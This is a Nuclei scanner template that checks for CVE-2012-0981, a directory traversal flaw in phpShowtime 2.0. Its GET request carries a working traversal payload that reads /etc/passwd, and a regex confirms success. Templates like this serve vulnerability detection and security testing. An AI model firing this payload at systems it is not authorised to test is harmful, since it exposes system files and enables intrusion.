my-nuclei-templates/CVE-2012-0981.yaml

34 lines
872 B
YAML

id: CVE-2012-0981
info:
name: phpShowtime 2.0 - Directory Traversal
author: daffainfo
severity: high
description: A directory traversal vulnerability in phpShowtime 2.0 allows remote attackers to list arbitrary directories and image files via a .. (dot dot) in the r parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/18435
- https://www.cvedetails.com/cve/CVE-2012-0981
- http://secunia.com/advisories/47802
- http://www.exploit-db.com/exploits/18435
classification:
cve-id: CVE-2012-0981
tags: cve,cve2012,lfi,phpshowtime
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?r=i/../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
- type: status
status:
- 200
# Enhanced by mp on 2022/02/21